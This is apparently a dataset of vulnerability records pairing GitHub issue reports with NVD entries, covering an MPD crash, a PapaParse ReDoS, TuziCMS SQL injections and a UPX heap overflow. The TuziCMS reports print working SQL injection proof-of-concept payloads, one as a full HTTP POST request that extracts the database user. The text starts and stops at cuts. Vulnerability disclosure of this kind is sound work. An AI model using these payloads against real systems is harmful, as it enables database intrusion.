"C:/Users/Paul/Downloads/playlists" log_file "C:/Users/Paul/Downloads/log" audio_output { type "null" name "My Null Output" } database { plugin "simple" path "C:/Users/Paul/Downloads/database" } ``` ## Log <!-- Paste relevant portions of the log file here (--verbose) --> <!-- If MPD has crashed, include a backtrace (see https://mpd.readthedocs.io/en/stable/user.html#mpd-crashes) --> The backtrace is misleading, since we're dealing with stack frame corruptions here, but added a few excerpts, depending on the length of the payload: ``` PS C:\Users\Paul\Downloads> gdb --args mpd --stderr --no-daemon --verbose mpd.conf GNU gdb (GDB) (Cygwin 11.2-1) 11.2 Copyright (C) 2022 Free Software Foundation, Inc. License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html> This is free software: you are free to change and redistribute it. There is NO WARRANTY, to the extent permitted by law. Type "show copying" and "show warranty" for details. This GDB was configured as "x86_64-pc-cygwin". Type "show configuration" for configuration details. For bug reporting instructions, please see: <https://www.gnu.org/software/gdb/bugs/>. Find the GDB manual and other documentation resources online at: <http://www.gnu.org/software/gdb/documentation/>. For help, type "help". Type "apropos word" to search for commands related to "word"... Reading symbols from mpd... (gdb) run Starting program: /cygdrive/c/Users/Paul/Downloads/mpd --stderr --no-daemon --verbose mpd.conf [New Thread 17592.0x512c] [New Thread 17592.0x4248] [New Thread 17592.0x2140] warning: Invalid parameter passed to C runtime function. config_file: loading file mpd.conf warning: Invalid parameter passed to C runtime function. vorbis: Xiph.Org libVorbis 1.3.7 opus: libopus 1.3.1 hybrid_dsd: The Hybrid DSD decoder is disabled because it was not explicitly enabled decoder: Decoder plugin 'wildmidi' is unavailable: configuration file does not exist: /etc/timidity/timidity.cfg simple_db: reading DB curl: version 7.85.0 curl: with Schannel input: Input plugin 'ffmpeg' is unavailable: No protocol [New Thread 17592.0x28a4] [New Thread 17592.0x1834] client: [0] opened from 192.168.0.60:15032 client: [0] process command "listplaylist AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" Thread 1 received signal SIGSEGV, Segmentation fault. 0x0000203a560f6c54 in ?? () (gdb) bt #0 0x0000203a560f6c54 in ?? () Backtrace stopped: previous frame identical to this frame (corrupt stack?) (gdb) ``` or ``` (gdb) run mpd.conf Starting program: /cygdrive/c/Users/Paul/Downloads/mpd mpd.conf [New Thread 6764.0x4328] [New Thread 6764.0xb08] [New Thread 6764.0x204c] warning: Invalid parameter passed to C runtime function. warning: Invalid parameter passed to C runtime function. Nov 27 23:28 : decoder: Decoder plugin 'wildmidi' is unavailable: configuration file does not exist: /etc/timidity/timidity.cfg [New Thread 6764.0x448c] [New Thread 6764.0x18fc] Thread 1 received signal SIGSEGV, Segmentation fault. 0x00007ff77f0d4166 in GetFullMessage[abi:cxx11](std::exception const&, char const*, char const*) (e=..., fallback=fallback@entry=0x7ff77f3d9be3 "Unknown exception", separator=separator@entry=0x7ff77f3d9be0 "; ") at ../../src/util/Exception.cxx:60 60 ../../src/util/Exception.cxx: No such file or directory. (gdb) bt #0 0x00007ff77f0d4166 in GetFullMessage[abi:cxx11](std::exception const&, char const*, char const*) (e=..., fallback=fallback@entry=0x7ff77f3d9be3 "Unknown exception", separator=separator@entry=0x7ff77f3d9be0 "; ") at ../../src/util/Exception.cxx:60 #1 0x00007ff77f0d4102 in GetFullMessage[abi:cxx11](std::__exception_ptr::exception_ptr, char const*, char const*) ( ep=..., fallback=fallback@entry=0x7ff77f3d9be3 "Unknown exception", separator=separator@entry=0x7ff77f3d9be0 "; ") at ../../src/util/Exception.cxx:72 #2 0x00007ff77f0ef783 in Log (level=level@entry=LogLevel::ERROR, ep=...) at ../../src/Log.cxx:44 #3 0x00007ff77f0e33e8 in LogError (ep=...) at ../../src/Log.hxx:141 #4 playlist_open_path_suffix (mutex=..., path=...) at ../../src/playlist/PlaylistStream.cxx:50 #5 playlist_open_path (path=..., mutex=...) at ../../src/playlist/PlaylistStream.cxx:62 #6 0x00007ff77f0e698a in playlist_open_in_playlist_dir (mutex=..., uri=0x29a3fe864f5 'A' <repeats 200 times>...) at ../../src/util/StringPointer.hxx:54 #7 playlist_mapper_open (uri=0x29a3fe864f5 'A' <repeats 200 times>..., storage=0x29a416f3dc0, mutex=...) at ../../src/playlist/PlaylistMapper.cxx:79 #8 0x00007ff77f0dfba9 in playlist_open_any (located_uri=..., storage=<optimized out>, mutex=...) at ../../src/playlist/PlaylistAny.cxx:46 #9 0x00007ff77f0e55c9 in playlist_file_print (r=..., partition=..., loader=..., uri=..., detail=detail@entry=false) at ../../src/playlist/Print.cxx:71 #10 0x00007ff77f0e4f02 in handle_listplaylist (client=..., args=..., r=...) at ../../src/client/Client.hxx:255 #11 0x00007ff77f0d8e33 in command_process (client=..., num=num@entry=0, line=line@entry=0x29a3fe864e8 "listplaylist") at ../../src/command/AllCommands.cxx:432 #12 0x00007ff77f18864d in Client::ProcessLine (this=this@entry=0x29a3fe864d0, line=<optimized out>, line@entry=0x29a3fe864e8 "listplaylist") at ../../src/client/Process.cxx:137 #13 0x00007ff77f188e53 in Client::OnSocketInput (length=<optimized out>, data=0x29a3fe864e8, this=0x29a3fe864d0) at ../../src/client/Read.cxx:49 #14 Client::OnSocketInput (this=0x29a3fe864d0, data=0x29a3fe864e8, length=<optimized out>) at ../../src/client/Read.cxx:29 #15 0x00007ff77f129b95 in BufferedSocket::ResumeInput (this=this@entry=0x29a3fe864d0) at ../../src/event/BufferedSocket.cxx:76 #16 0x00007ff77f129dc9 in BufferedSocket::OnSocketReady (this=0x29a3fe864d0, flags=<optimized out>) at ../../src/event/BufferedSocket.cxx:113 #17 0x00007ff77f19c552 in EventLoop::Run (this=this@entry=0xe4983fd378) at ../../src/event/Loop.cxx:362 #18 0x00007ff77f0f8bf3 in MainConfigured (options=..., raw_config=...) at ../../src/Main.cxx:576 #19 0x00007ff77f0f4478 in MainOrThrow (argc=argc@entry=2, argv=argv@entry=0x29a3fe81850) at ../../src/Main.cxx:691 #20 0x00007ff77f0f1e19 in mpd_main (argc=argc@entry=2, argv=argv@entry=0x29a3fe81850) at ../../src/Main.cxx:697 #21 0x00007ff77f0cd60a in win32_main (argc=argc@entry=2, argv=argv@entry=0x29a3fe81850) at ../../src/win32/Win32Main.cxx:137 #22 0x00007ff77f38075e in main (argc=2, argv=0x29a3fe81850) at ../../src/Main.cxx:707 (gdb) ```
MPD crashes on windows when large input is submitted
https://api.github.com/repos/MusicPlayerDaemon/MPD/issues/1676/comments
12
2022-11-27T22:51:17Z
2022-12-13T13:32:44Z
https://github.com/MusicPlayerDaemon/MPD/issues/1676
1,465,603,491
1,676
4,608
CVE-2020-36649
2023-01-11T15:15:09.207
A vulnerability was found in mholt PapaParse up to 5.1.x. It has been classified as problematic. Affected is an unknown function of the file papaparse.js. The manipulation leads to inefficient regular expression complexity. Upgrading to version 5.2.0 is able to address this issue. The name of the patch is 235a12758cd77266d2e98fd715f53536b34ad621. It is recommended to upgrade the affected component. The identifier of this vulnerability is VDB-218004.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "LOW", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "ADJACENT_NETWORK", "authentication": "SINGLE", "availabilityImpact": "PARTIAL", "baseScore": 2.3, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:A/AC:M/Au:S/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 4.4, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "cna@vuldb.com", "type": "Secondary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "ADJACENT_NETWORK", "availabilityImpact": "LOW", "baseScore": 3.5, "baseSeverity": "LOW", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:A/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L", "version": "3.1" }, "exploitabilityScore": 2.1, "impactScore": 1.4, "source": "cna@vuldb.com", "type": "Secondary" }, { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cna@vuldb.com", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/mholt/PapaParse/commit/235a12758cd77266d2e98fd715f53536b34ad621" }, { "source": "cna@vuldb.com", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/mholt/PapaParse/issues/777" }, { "source": "cna@vuldb.com", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/mholt/PapaParse/pull/779" }, { "source": "cna@vuldb.com", "tags": [ "Release Notes", "Third Party Advisory" ], "url": "https://github.com/mholt/PapaParse/releases/tag/5.2.0" }, { "source": "cna@vuldb.com", "tags": [ "Permissions Required", "Third Party Advisory" ], "url": "https://vuldb.com/?ctiid.218004" }, { "source": "cna@vuldb.com", "tags": [ "Permissions Required", "Third Party Advisory" ], "url": "https://vuldb.com/?id.218004" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/mholt/PapaParse/commit/235a12758cd77266d2e98fd715f53536b34ad621" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/mholt/PapaParse/issues/777" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/mholt/PapaParse/pull/779" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Release Notes", "Third Party Advisory" ], "url": "https://github.com/mholt/PapaParse/releases/tag/5.2.0" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Permissions Required", "Third Party Advisory" ], "url": "https://vuldb.com/?ctiid.218004" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Permissions Required", "Third Party Advisory" ], "url": "https://vuldb.com/?id.218004" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:papaparse:papaparse:*:*:*:*:*:*:*:*", "matchCriteriaId": "408FE68A-CC37-48C7-8DF6-1DE7B0F3257A", "versionEndExcluding": "5.2.0", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": "5.1.0", "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "1333" ]
1333
https://github.com/mholt/PapaParse/issues/777
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "mholt", "PapaParse" ]
Basically the title says everything. Node code to test: ```javascript const Papa = require('papaparse'); const input = '0'.repeat(10000); const options = {dynamicTyping: true}; let start = process.hrtime.bigint(); Papa.parse(input, options); let end = process.hrtime.bigint(); console.log(`Numerical input: ${Number(end - start) / 1e9} seconds`); start = process.hrtime.bigint(); Papa.parse(input + 'a', options); end = process.hrtime.bigint(); console.log(`Non-numerical input: ${Number(end - start) / 1e9} seconds`); ``` Results on my PC: For 10000 characters: ``` Numerical input: 0.002068456 seconds Non-numerical input: 0.574908789 seconds ``` For 100000 characters (note the exponential growth): ``` Numerical input: 0.002522945 seconds Non-numerical input: 57.080913533 seconds ``` This comes from `var FLOAT = /^\s*-?(\d*\.?\d+|\d+\.?\d*)(e[-+]?\d+)?\s*$/i;` and the issue is in `(\d*\.?\d+|\d+\.?\d*)` segment. One possible solution - replace current RE with something like `/^\s*-?(\d+\.?|\.\d+|\d+\.\d+)(e[-+]?\d+)?\s*$/`. Looks ugly but it works.
RegExp used to detect numbers is vulnerable to ReDoS
https://api.github.com/repos/mholt/PapaParse/issues/777/comments
3
2020-04-02T11:00:07Z
2020-04-02T13:17:33Z
https://github.com/mholt/PapaParse/issues/777
592,543,086
777
4,609
CVE-2023-0243
2023-01-12T15:15:10.430
A vulnerability classified as critical has been found in TuziCMS 2.0.6. This affects the function index of the file App\Manage\Controller\ArticleController.class.php of the component Article Module. The manipulation of the argument id leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-218151.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "PARTIAL", "baseScore": 6.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 8, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "cna@vuldb.com", "type": "Secondary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "LOW", "baseScore": 6.3, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 3.4, "source": "cna@vuldb.com", "type": "Secondary" }, { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cna@vuldb.com", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/yeyinshi/tuzicms/issues/12" }, { "source": "cna@vuldb.com", "tags": [ "Permissions Required", "Third Party Advisory" ], "url": "https://vuldb.com/?ctiid.218151" }, { "source": "cna@vuldb.com", "tags": [ "Permissions Required", "Third Party Advisory" ], "url": "https://vuldb.com/?id.218151" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/yeyinshi/tuzicms/issues/12" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Permissions Required", "Third Party Advisory" ], "url": "https://vuldb.com/?ctiid.218151" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Permissions Required", "Third Party Advisory" ], "url": "https://vuldb.com/?id.218151" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:tuzicms_project:tuzicms:2.0.6:*:*:*:*:*:*:*", "matchCriteriaId": "097B9B8D-F29E-410A-8FB1-2E8812FE9233", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "89" ]
89
https://github.com/yeyinshi/tuzicms/issues/12
[ "Exploit", "Third Party Advisory" ]
github.com
[ "yeyinshi", "tuzicms" ]
\App\Manage\Controller\ArticleController.class.php line: 18 - 22 public function index(){ C('TOKEN_ON',false);//关闭表单令牌 //查询指定id的栏目信息 $id=I('get.id');//类别ID $topcate=M('Column')->where("id=$id")->order('column_sort')->select(); dump($topcate); exit; POC:http://127.0.0.1/tuzicms/index.php/Manage/Article/index/id/1 and (extractvalue(1,concat(0x7e,(select user()),0x7e))) ![34861673494776_ pic](https://user-images.githubusercontent.com/34962070/211970305-9165aee0-e2c5-49f3-b1be-c9081a8f24eb.jpg) ![34871673494829_ pic](https://user-images.githubusercontent.com/34962070/211970390-70e8cc55-6ad0-487c-921a-76740d41b1ef.jpg)
App\Manage\Controller\ArticleController.class.php has SQLinject
https://api.github.com/repos/yeyinshi/tuzicms/issues/12/comments
1
2023-01-12T03:29:36Z
2023-01-12T03:40:41Z
https://github.com/yeyinshi/tuzicms/issues/12
1,530,037,113
12
4,610
CVE-2023-0244
2023-01-12T15:15:10.517
A vulnerability classified as critical was found in TuziCMS 2.0.6. This vulnerability affects the function delall of the file \App\Manage\Controller\KefuController.class.php. The manipulation of the argument id leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-218152.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "PARTIAL", "baseScore": 6.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 8, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "cna@vuldb.com", "type": "Secondary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "LOW", "baseScore": 6.3, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 3.4, "source": "cna@vuldb.com", "type": "Secondary" }, { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cna@vuldb.com", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/yeyinshi/tuzicms/issues/13" }, { "source": "cna@vuldb.com", "tags": [ "Permissions Required", "Third Party Advisory" ], "url": "https://vuldb.com/?ctiid.218152" }, { "source": "cna@vuldb.com", "tags": [ "Permissions Required", "Third Party Advisory" ], "url": "https://vuldb.com/?id.218152" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/yeyinshi/tuzicms/issues/13" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Permissions Required", "Third Party Advisory" ], "url": "https://vuldb.com/?ctiid.218152" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Permissions Required", "Third Party Advisory" ], "url": "https://vuldb.com/?id.218152" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:tuzicms_project:tuzicms:2.0.6:*:*:*:*:*:*:*", "matchCriteriaId": "097B9B8D-F29E-410A-8FB1-2E8812FE9233", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "89" ]
89
https://github.com/yeyinshi/tuzicms/issues/13
[ "Exploit", "Third Party Advisory" ]
github.com
[ "yeyinshi", "tuzicms" ]
line: 157 - 196 ` public function delall(){ //dump($_POST); //exit; $m=D('Advert'); //数据库表,配置文件中定义了表前缀,这里则不需要写 $id = I('post.id'); //dump($id); //exit; if ($id==null){ $this->error('请选择删除项!'); } //判断id是数组还是一个数值 if(is_array($id)){ $where = 'id in('.implode(',',$id).')'; //implode() 函数返回一个由数组元素组合成的字符串 }else{ $where = 'id='.$id; } //dump($where); //exit; $m=M('Advert'); $arr=$m->where($where)->select(); foreach ($arr as $key => $value){ $images=$value['advert_image']; //dump($images); //exit; unlink('./Uploads/'.$images); } $count=$m->where($where)->delete(); //修改表单用save函数 if ($count>0){ $this->success("成功删除{$count}条!"); } else { $this->error('批量删除失败!'); } } ` Because the security syntax of thinkphp framework is not used here, and $id is used to splice the $where variable for query, resulting in a serious SQL injection vulnerability. May cause serious harm to the system. ![34901673506227_ pic](https://user-images.githubusercontent.com/34962070/211997781-2f5d413c-0d33-4154-9a7a-aa7f18312033.jpg) ![34891673506177_ pic](https://user-images.githubusercontent.com/34962070/211997792-c8bb7647-3ae4-4908-a1ec-57b5873adeb0.jpg) poc: `POST /index.php/manage/kefu/delall HTTP/1.1 Host: www.tuzi.com Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9 Cookie: PHPSESSID=4o7ddlgmm58fnm8ngse5v5eaq2 x-forwarded-for: 8.8.8.8 x-originating-ip: 8.8.8.8 x-remote-ip: 8.8.8.8 x-remote-addr: 8.8.8.8 Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 73 id=1/**/and/**/(extractvalue(1,concat(0x7e,(select/**/user()),0x7e))) `
\App\Manage\Controller\KefuController.class.php has SQLinject
https://api.github.com/repos/yeyinshi/tuzicms/issues/13/comments
0
2023-01-12T06:58:38Z
2023-01-12T06:58:38Z
https://github.com/yeyinshi/tuzicms/issues/13
1,530,204,744
13
4,611
CVE-2023-23456
2023-01-12T19:15:24.693
A heap-based buffer overflow issue was discovered in UPX in PackTmt::pack() in p_tmt.cpp file. The flow allows an attacker to cause a denial of service (abort) via a crafted file.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "LOW", "baseScore": 5.3, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:L", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.4, "source": "patrick@puiterwijk.org", "type": "Secondary" }, { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "patrick@puiterwijk.org", "tags": [ "Issue Tracking", "Third Party Advisory" ], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2160381" }, { "source": "patrick@puiterwijk.org", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/upx/upx/commit/510505a85cbe45e51fbd470f1aa8b02157c429d4" }, { "source": "patrick@puiterwijk.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/upx/upx/issues/632" }, { "source": "patrick@puiterwijk.org", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/EL3BVKIGG3SH6I3KPOYQAWCBD4UMPOPI/" }, { "source": "patrick@puiterwijk.org", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/TGEP3FBNRZXGLIA2B2ICMB32JVMPREFZ/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Issue Tracking", "Third Party Advisory" ], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2160381" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/upx/upx/commit/510505a85cbe45e51fbd470f1aa8b02157c429d4" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/upx/upx/issues/632" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.debian.org/debian-lts-announce/2024/12/msg00013.html" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/EL3BVKIGG3SH6I3KPOYQAWCBD4UMPOPI/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/TGEP3FBNRZXGLIA2B2ICMB32JVMPREFZ/" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:upx_project:upx:*:*:*:*:*:*:*:*", "matchCriteriaId": "CB529776-278E-419A-B8E1-F7A101A77E24", "versionEndExcluding": "2022-11-24", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:fedoraproject:fedora:36:*:*:*:*:*:*:*", "matchCriteriaId": "5C675112-476C-4D7C-BCB9-A2FB2D0BC9FD", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:o:fedoraproject:fedora:37:*:*:*:*:*:*:*", "matchCriteriaId": "E30D0E6F-4AE8-4284-8716-991DFA48CC5D", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "787" ]
787
https://github.com/upx/upx/issues/632
[ "Exploit", "Third Party Advisory" ]
github.com
[ "upx", "upx" ]
<!--- IF YOU REMOVE THIS TEMPLATE WE WILL CLOSE YOUR ISSUE WITHOUT RESPONSE. Just read it and fill in the details we're asking, it saves so much of our time. Thanks! --> ## What's the problem (or question)? <!--- If describing a bug, tell us what happens instead of the expected behavior --> <!--- If suggesting a change/improvement, explain the difference from current behavior --> MemBuffer is attempted to be allocated with 0 bytes, failing an assertion in mem.cpp. ASAN ``` Ultimate Packer for eXecutables Copyright (C) 1996 - 2022 UPX git-fdec47+ Markus Oberhumer, Laszlo Molnar & John Reiser Nov 16th 2022 File size Ratio Format Name -------------------- ------ ----------- ----------- ================================================================= ==11363==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x60200000ee15 at pc 0x00000051ca96 bp 0x7fffffffc800 sp 0x7fffffffc7f0 WRITE of size 4 at 0x60200000ee15 thread T0 #0 0x51ca95 in set_ne32 /home/chen/upx/src/bele.h:66 #1 0x51ca95 in set_le32(void*, unsigned int) /home/chen/upx/src/bele.h:143 #2 0x51ca95 in PackTmt::pack(OutputFile*) /home/chen/upx/src/p_tmt.cpp:244 #3 0x569704 in Packer::doPack(OutputFile*) /home/chen/upx/src/packer.cpp:96 #4 0x61ca72 in do_one_file(char const*, char*) /home/chen/upx/src/work.cpp:157 #5 0x61cf89 in do_files(int, int, char**) /home/chen/upx/src/work.cpp:271 #6 0x45fe9f in upx_main(int, char**) /home/chen/upx/src/main.cpp:1266 #7 0x407223 in main /home/chen/upx/src/main.cpp:1324 #8 0x7ffff621f83f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2083f) #9 0x409ef8 in _start (/home/chen/ifcut/upx/upx-asan+0x409ef8) 0x60200000ee15 is located 0 bytes to the right of 5-byte region [0x60200000ee10,0x60200000ee15) allocated by thread T0 here: #0 0x7ffff6f02602 in malloc (/usr/lib/x86_64-linux-gnu/libasan.so.2+0x98602) #1 0x5f3123 in MemBuffer::alloc(unsigned long long) /home/chen/upx/src/util/membuffer.cpp:181 #2 0x51b6d2 in PackTmt::pack(OutputFile*) /home/chen/upx/src/p_tmt.cpp:219 #3 0x569704 in Packer::doPack(OutputFile*) /home/chen/upx/src/packer.cpp:96 #4 0x61ca72 in do_one_file(char const*, char*) /home/chen/upx/src/work.cpp:157 